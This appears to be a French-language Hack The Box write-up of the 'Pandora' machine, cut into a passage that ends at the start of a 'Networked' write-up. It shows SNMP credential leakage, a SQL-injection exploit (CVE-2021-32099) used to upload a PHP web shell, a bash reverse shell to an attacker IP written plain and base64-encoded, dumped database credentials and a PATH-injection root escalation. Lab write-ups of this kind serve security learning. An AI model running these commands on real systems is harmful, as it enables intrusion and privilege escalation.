<span class="o">=</span> OID: iso.3.6.1.4.1.8072.3.2.10 </span></span><span class="line"><span class="cl">iso.3.6.1.2.1.1.3.0 <span class="o">=</span> Timeticks: <span class="o">(</span>243441<span class="o">)</span> 0:40:34.41 </span></span><span class="line"><span class="cl">iso.3.6.1.2.1.1.4.0 <span class="o">=</span> STRING: <span class="s2">&#34;Daniel&#34;</span> </span></span><span class="line"><span class="cl">iso.3.6.1.2.1.1.5.0 <span class="o">=</span> STRING: <span class="s2">&#34;pandora&#34;</span> </span></span><span class="line"><span class="cl">iso.3.6.1.2.1.1.6.0 <span class="o">=</span> STRING: <span class="s2">&#34;Mississippi&#34;</span> </span></span><span class="line"><span class="cl">iso.3.6.1.2.1.1.7.0 <span class="o">=</span> INTEGER: <span class="m">72</span> </span></span><span class="line"><span class="cl">iso.3.6.1.2.1.1.8.0 <span class="o">=</span> Timeticks: <span class="o">(</span>34<span class="o">)</span> 0:00:00.34 </span></span><span class="line"><span class="cl">iso.3.6.1.2.1.1.9.1.2.1 <span class="o">=</span> OID: iso.3.6.1.6.3.10.3.1.1 </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">$ snmpwalk -v2c -c public 10.10.11.136 &gt; snmpwalk.out </span></span><span class="line"><span class="cl">$ grep -rni string snmpwalk.out </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">1867:iso.3.6.1.2.1.25.4.2.1.5.962 <span class="o">=</span> STRING: <span class="s2">&#34;--no-debug&#34;</span> </span></span><span class="line"><span class="cl">1868:iso.3.6.1.2.1.25.4.2.1.5.977 <span class="o">=</span> STRING: <span class="s2">&#34;-k start&#34;</span> </span></span><span class="line"><span class="cl">1869:iso.3.6.1.2.1.25.4.2.1.5.1085 <span class="o">=</span> STRING: <span class="s2">&#34;-u daniel -p HotelBabylon23&#34;</span> &lt;---------- </span></span><span class="line"><span class="cl">1870:iso.3.6.1.2.1.25.4.2.1.5.1225 <span class="o">=</span> STRING: <span class="s2">&#34;-k start&#34;</span> </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>On trouve les credentials de l&rsquo;utilisateur Daniel. En essayant de se connecter en SSH, ça fonctionne :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ssh daniel@10.10.11.136 </span></span><span class="line"><span class="cl">daniel@10.10.11.136<span class="err">&#39;</span>s password: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Last login: Fri Sep <span class="m">5</span> 12:29:55 <span class="m">2025</span> from 10.10.14.8 </span></span><span class="line"><span class="cl">-bash: warning: setlocale: LC_ALL: cannot change locale <span class="o">(</span>en_US.UTF-8<span class="o">)</span> </span></span><span class="line"><span class="cl">daniel@pandora:~$ whoami </span></span><span class="line"><span class="cl">daniel </span></span><span class="line"><span class="cl">daniel@pandora:~$ ls /home/ </span></span><span class="line"><span class="cl">daniel matt </span></span></code></pre></td></tr></table> </div> </div><p>On découvre alors l&rsquo;utilisateur <strong>matt</strong>.</p> <h2 id="daniel---matt">daniel -&gt; matt </h2><h3 id="pandora-cms-v70ng742">Pandora CMS v7.0NG.742 </h3><p>On trouve un dossier &ldquo;pandora_console&rdquo; dans /var/www. On se rend compte dans /etc/host qu&rsquo;il semble y a avoir un deuxieme site web sur 127.0.0.1:80. J&rsquo;ai décidé de faire du port forwarding pour accéder au site web depuis mon navigateur sur le port 8888 de ma machine :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ssh daniel@10.10.11.136 -L 8888:127.0.0.1:80 </span></span></code></pre></td></tr></table> </div> </div><p>On trouve alors une page de login <strong>Pandora CMS v7.0NG.742</strong>.</p> <h3 id="cve-2021-32099">CVE-2021-32099 </h3><p>Après quelque recherches, on trouve plusieurs CVE dont une injection SQL : <strong>CVE-2021-32099</strong>.</p> <p>Elle nous permet de se connecter en tant qu&rsquo;admin et de téléverser un fichier php nous permettant d&rsquo;executer du code sur la machine en tant que l&rsquo;utilisateur <strong>matt</strong>.</p> <p><strong>Exploit</strong> : <a class="link" href="https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated/tree/master" target="_blank" rel="noopener" >https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated/tree/master</a></p> <p>J&rsquo;ai pu utiliser un exploit déjà écrit, qui execute l&rsquo;injection SQL et upload directement un fichier php pour nous. Il nous donne un shell non-interactif.</p> <p>J&rsquo;ai executé un reverse shell, que j&rsquo;ai converti en base64 puis j&rsquo;ai URL encoded le tout car je sais que le script python fait une requete GET sur le fichier php et passe mes commandes dans l&rsquo;URL.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">python3 sqlpwn.py -t 127.0.0.1:8888 </span></span><span class="line"><span class="cl">URL: http://127.0.0.1:8888/pandora_console </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Sending Injection Payload </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Requesting Session </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Admin Session Cookie : lkgcnm6itdo17dmogbhc6733j1 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Sending Payload </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Respose : <span class="m">200</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Pwned :<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> If you want manual Control : http://127.0.0.1:8888/pandora_console/images/pwn.php?test<span class="o">=</span> </span></span><span class="line"><span class="cl">CMD &gt; bash -i &gt;<span class="p">&amp;</span> /dev/tcp/10.10.14.8/1337 0&gt;<span class="p">&amp;</span><span class="m">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">CMD &gt; echo%20YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC44LzEzMzcgMD4mMQ%3D%3D%20%7C%20base64%20-d%20%7C%20bash </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">matt@pandora:/var/www/pandora/pandora_console/images$ python3 -c <span class="s1">&#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl">&lt;ges$ python3 -c <span class="s1">&#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl">matt@pandora:/var/www/pandora/pandora_console/images$ <span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl">matt@pandora:/var/www/pandora/pandora_console/images$ ^Z </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">27546</span> suspended nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">$ stty raw -echo<span class="p">;</span><span class="nb">fg</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">27546</span> continued nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">matt@pandora:/var/www/pandora/pandora_console/images$ whoami </span></span><span class="line"><span class="cl">matt </span></span><span class="line"><span class="cl">matt@pandora:/var/www/pandora/pandora_console/images$ <span class="nb">cd</span> /home/matt </span></span><span class="line"><span class="cl">matt@pandora:/home/matt$ cat user.txt </span></span><span class="line"><span class="cl">2251.....82e1 </span></span></code></pre></td></tr></table> </div> </div><h3 id="pandora-database-creds">Pandora Database Creds </h3><p>J&rsquo;ai trouvé le mot de passe de la base de donnée mysql mais impossible de cracker les hachages. Sauf celui de daniel, qui correspond bien au même mot de passe qu&rsquo;en SSH.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">matt@pandora:~$ cat /var/www/pandora/pandora_console/include/config.php </span></span><span class="line"><span class="cl">&lt;?php </span></span><span class="line"><span class="cl">// File generated by centos kickstart </span></span><span class="line"><span class="cl"><span class="nv">$config</span><span class="o">[</span><span class="s2">&#34;dbtype&#34;</span><span class="o">]</span> <span class="o">=</span> <span class="s2">&#34;mysql&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$config</span><span class="o">[</span><span class="s2">&#34;dbname&#34;</span><span class="o">]=</span><span class="s2">&#34;pandora&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$config</span><span class="o">[</span><span class="s2">&#34;dbuser&#34;</span><span class="o">]=</span><span class="s2">&#34;pandora&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$config</span><span class="o">[</span><span class="s2">&#34;dbpass&#34;</span><span class="o">]=</span><span class="s2">&#34;PandoraFMSSecurePass2021&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$config</span><span class="o">[</span><span class="s2">&#34;dbhost&#34;</span><span class="o">]=</span><span class="s2">&#34;localhost&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$config</span><span class="o">[</span><span class="s2">&#34;homedir&#34;</span><span class="o">]=</span><span class="s2">&#34;/var/www/pandora/pandora_console&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$config</span><span class="o">[</span><span class="s2">&#34;homeurl&#34;</span><span class="o">]=</span><span class="s2">&#34;/pandora_console&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl">error_reporting<span class="o">(</span>0<span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$ownDir</span> <span class="o">=</span> dirname<span class="o">(</span>__FILE__<span class="o">)</span> . <span class="s1">&#39;/&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl">include <span class="o">(</span><span class="nv">$ownDir</span> . <span class="s2">&#34;config_process.php&#34;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl">?&gt; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">MariaDB <span class="o">[</span>pandora<span class="o">]</span>&gt; <span class="k">select</span> email,password from tusuario<span class="p">;</span> </span></span><span class="line"><span class="cl">+--------------------+----------------------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> email <span class="p">|</span> password <span class="p">|</span> </span></span><span class="line"><span class="cl">+--------------------+----------------------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> admin@pandora.htb <span class="p">|</span> ad3f741b04bd5880fb32b54bc4f43d6a <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> daniel@pandora.htb <span class="p">|</span> 76323c174bd49ffbbdedf678f6cc89a6 <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> matt@pandora.htb <span class="p">|</span> f655f807365b6dc602b31ab3d6d43acc <span class="p">|</span> </span></span><span class="line"><span class="cl">+--------------------+----------------------------------+ </span></span><span class="line"><span class="cl"><span class="m">3</span> rows in <span class="nb">set</span> <span class="o">(</span>0.000 sec<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="matt---root">matt -&gt; root </h2><h3 id="ssh-session">SSH session </h3><p>Dans un premier temps, j&rsquo;ai essayé d&rsquo;executer &ldquo;sudo -l&rdquo;, mais une erreur bizarre s&rsquo;affiche :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">matt@pandora:/home/matt/.ssh$ sudo -l </span></span><span class="line"><span class="cl">sudo: PERM_ROOT: setresuid<span class="o">(</span>0, -1, -1<span class="o">)</span>: Operation not permitted </span></span><span class="line"><span class="cl">sudo: unable to initialize policy plugin </span></span></code></pre></td></tr></table> </div> </div><p>J&rsquo;ai donc décidé de générer une paire de clés et de me connecter à matt en utilisant <strong>SSH</strong> pour plus de stabilité. Cela va avoir son importance pour l&rsquo;exploitation :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ssh-keygen -t rsa -b <span class="m">4096</span> -f matt </span></span><span class="line"><span class="cl">Generating public/private rsa key pair. </span></span><span class="line"><span class="cl">Enter passphrase <span class="o">(</span>empty <span class="k">for</span> no passphrase<span class="o">)</span>: </span></span><span class="line"><span class="cl">Enter same passphrase again: </span></span><span class="line"><span class="cl">Your identification has been saved in matt </span></span><span class="line"><span class="cl">Your public key has been saved in matt.pub </span></span><span class="line"><span class="cl">The key fingerprint is: </span></span><span class="line"><span class="cl">SHA256:BH80icivzuGhGoIvDyqROBTJ3Yos2GjweEF7u2FwJrI root@exegol-pentest </span></span><span class="line"><span class="cl">The key<span class="s1">&#39;s randomart image is: </span></span></span><span class="line"><span class="cl"><span class="s1">+---[RSA 4096]----+ </span></span></span><span class="line"><span class="cl"><span class="s1">|..+ .... .o. | </span></span></span><span class="line"><span class="cl"><span class="s1">|.+.o .oo.... | </span></span></span><span class="line"><span class="cl"><span class="s1">|==*.= .o . | </span></span></span><span class="line"><span class="cl"><span class="s1">|=B+B . ... | </span></span></span><span class="line"><span class="cl"><span class="s1">|Eo + .S | </span></span></span><span class="line"><span class="cl"><span class="s1">|* . o+ | </span></span></span><span class="line"><span class="cl"><span class="s1">|+o. .= o | </span></span></span><span class="line"><span class="cl"><span class="s1">|++ .. + | </span></span></span><span class="line"><span class="cl"><span class="s1">|oo+. | </span></span></span><span class="line"><span class="cl"><span class="s1">+----[SHA256]-----+ </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">$ ssh matt@10.10.11.136 -i matt </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64) </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by </span></span></span><span class="line"><span class="cl"><span class="s1">applicable law. </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">-bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8) </span></span></span><span class="line"><span class="cl"><span class="s1">matt@pandora:~$ sudo -l </span></span></span><span class="line"><span class="cl"><span class="s1">[sudo] password for matt: # On observe bien qu&#39;</span>il n<span class="s1">&#39;y a plus d&#39;</span>erreur ici </span></span><span class="line"><span class="cl">matt@pandora:~$ </span></span></code></pre></td></tr></table> </div> </div><h3 id="usrbinpandora_backup">/usr/bin/pandora_backup </h3><p>En utilisant <strong>linpeas</strong>, on découvre un binaire SUID suspect <strong>/usr/bin/pandora_backup</strong>. Après analyse du binaire, il semble execute la commande <strong>tar</strong> en tant que root.</p> <p>Il n&rsquo;utilise pas un path absolu, comme par exemple &ldquo;/bin/tar&rdquo;, ce qui va nous permettre de faire une attaque de type PATH injection :</p> <p>Voici le code décompilé :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">int __cdecl main<span class="o">(</span>int argc, const char **argv, const char **envp<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">{</span> </span></span><span class="line"><span class="cl"> __uid_t v3<span class="p">;</span> // ebx </span></span><span class="line"><span class="cl"> __uid_t v4<span class="p">;</span> // eax </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nv">v3</span> <span class="o">=</span> getuid<span class="o">()</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nv">v4</span> <span class="o">=</span> geteuid<span class="o">()</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> setreuid<span class="o">(</span>v4, v3<span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> puts<span class="o">(</span><span class="s2">&#34;PandoraFMS Backup Utility&#34;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> puts<span class="o">(</span><span class="s2">&#34;Now attempting to backup PandoraFMS client&#34;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="o">(</span> system<span class="o">(</span><span class="s2">&#34;tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*&#34;</span><span class="o">)</span> <span class="o">)</span> </span></span><span class="line"><span class="cl"> <span class="o">{</span> </span></span><span class="line"><span class="cl"> puts<span class="o">(</span><span class="s2">&#34;Backup failed!\nCheck your permissions!&#34;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> 1<span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="o">{</span> </span></span><span class="line"><span class="cl"> puts<span class="o">(</span><span class="s2">&#34;Backup successful!&#34;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> puts<span class="o">(</span><span class="s2">&#34;Terminating program!&#34;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> 0<span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>Le problème majeur de cette box, est que si on se connecte pas en SSH, le binaire SUID ne s&rsquo;execute pas en tant que root et il y a une erreur <strong>Permission Denied</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">matt@pandora:/home/matt/.ssh$ /usr/bin/pandora_backup </span></span><span class="line"><span class="cl">PandoraFMS Backup Utility </span></span><span class="line"><span class="cl">Now attempting to backup PandoraFMS client </span></span><span class="line"><span class="cl">tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied </span></span><span class="line"><span class="cl">tar: Error is not recoverable: exiting now </span></span><span class="line"><span class="cl">Backup failed! </span></span><span class="line"><span class="cl">Check your permissions! </span></span></code></pre></td></tr></table> </div> </div><p>En utilisant <strong>SSH</strong>, le problème disparait et la commande <strong>tar</strong> s&rsquo;execute bien en tant que <strong>root</strong>.<br> Le binaire SUID est désormais exploitable :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">matt@pandora:~$ /usr/bin/pandora_backup </span></span><span class="line"><span class="cl">PandoraFMS Backup Utility </span></span><span class="line"><span class="cl">Now attempting to backup PandoraFMS client </span></span><span class="line"><span class="cl">Backup successful! </span></span><span class="line"><span class="cl">Terminating program! </span></span></code></pre></td></tr></table> </div> </div><p>Voici un exemple d&rsquo;exploitation simple. On crée un fichier &ldquo;tar&rdquo; contenant la commande /bin/bash, on lui donne les droits en execution et on place le dossier où il se trouve (home directory de matt) au debut dans la variable <strong>$PATH</strong>. Lorsqu&rsquo;on execute <strong>which</strong> on observe bien que notre <strong>tar</strong> à remplacer la véritable commande. Il ne reste plus qu&rsquo;a executer notre binaire SUID pandora_backup pour obtenir un shell en tant que root :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">matt@pandora:~$ <span class="nb">echo</span> <span class="s2">&#34;/bin/bash&#34;</span> &gt; tar </span></span><span class="line"><span class="cl">matt@pandora:~$ chmod +x tar </span></span><span class="line"><span class="cl">matt@pandora:~$ <span class="nb">export</span> <span class="nv">PATH</span><span class="o">=</span>/home/matt:<span class="nv">$PATH</span> </span></span><span class="line"><span class="cl">matt@pandora:~# which tar </span></span><span class="line"><span class="cl">/home/matt/tar </span></span><span class="line"><span class="cl">matt@pandora:~$ /usr/bin/pandora_backup </span></span><span class="line"><span class="cl">PandoraFMS Backup Utility </span></span><span class="line"><span class="cl">Now attempting to backup PandoraFMS client </span></span><span class="line"><span class="cl">root@pandora:~# whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">root@pandora:~# cat /root/root.txt </span></span><span class="line"><span class="cl">fd9c.....291d </span></span></code></pre></td></tr></table> </div> </div><h2 id="tips">Tips </h2><ul> <li><strong>Toujours lancer un scan des ports UDP</strong> : D&rsquo;abord un petit scan, puis un gros si on ne trouve rien d&rsquo;autre.</li> <li>Si le port SSH est ouvert : toujours essayer de générer une paire clés SSH, placé le .pub dans authorized_keys et effectuer une connexion. Sur cette boxe, il était un impossible de faire sudo -l. Un bug empêchant d&rsquo;exploiter le binaire pandora_backup SUID. A travers la session SSH, le bug n&rsquo;était plus présent. Donc dans le doute : toujours tenter une connexion SSH.</li> </ul> <p>Pour savoir s&rsquo;il est possble de se connecter en ssh, en utilisant une paire de clés il faut vérifier le fichier de configuration ssh coté serveur : <code>/etc/ssh/sshd_config</code> Si :</p> <ul> <li>#PubkeyAuthentication yes &ndash;&gt; Commenté, valeur par défaut &ldquo;yes&rdquo;, donc c&rsquo;est possible</li> <li>#AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2 &ndash;&gt; commenté, par défaut &ldquo;.ssh/authorized_keys&rdquo; donc c&rsquo;est Okay</li> <li>AllowUsers daniel matt &ndash;&gt; Seulement ces utilisateurs peuvent se connecter en ssh</li> <li>UsePAM yes &ndash;&gt; le mot de passe classique fonctionne via PAM mais ça ne bloque pas les clés pour autant</li> </ul>https://leopoldabgn.github.io/writeups/p/networked-htb/Thu, 04 Sep 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/networked-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Networked cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Networked</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.146</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.146 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 7.4 <span class="o">(</span>protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> 2275d7a74f81a7af5266e52744b1015b <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFgr+LYQ5zL9JWnZmjxP7FT1134sJla89HBT+qnqNvJQRHwO7IqPSa5tEWGZYtzQ2BehsEqb/PisrRHlTeatK0X8qrS3tuz+l1nOj3X/wdcgnFXBrhwpRB2spULt2YqRM49aEbm7bRf2pctxuvgeym/pwCghb6nSbdsaCIsoE+X7QwbG0j6ZfoNIJzQkTQY7O+n1tPP8mlwPOShZJP7+NWVf/kiHsgZqVx6xroCp/NYbQTvLWt6VF/V+iZ3tiT7E1JJxJqQ05wiqsnjnFaZPYP+ptTqorUKP4AenZnf9Wan7VrrzVNZGnFlczj/BsxXOYaRe4Q8VK4PwiDbcwliOBd </span></span><span class="line"><span class="cl"><span 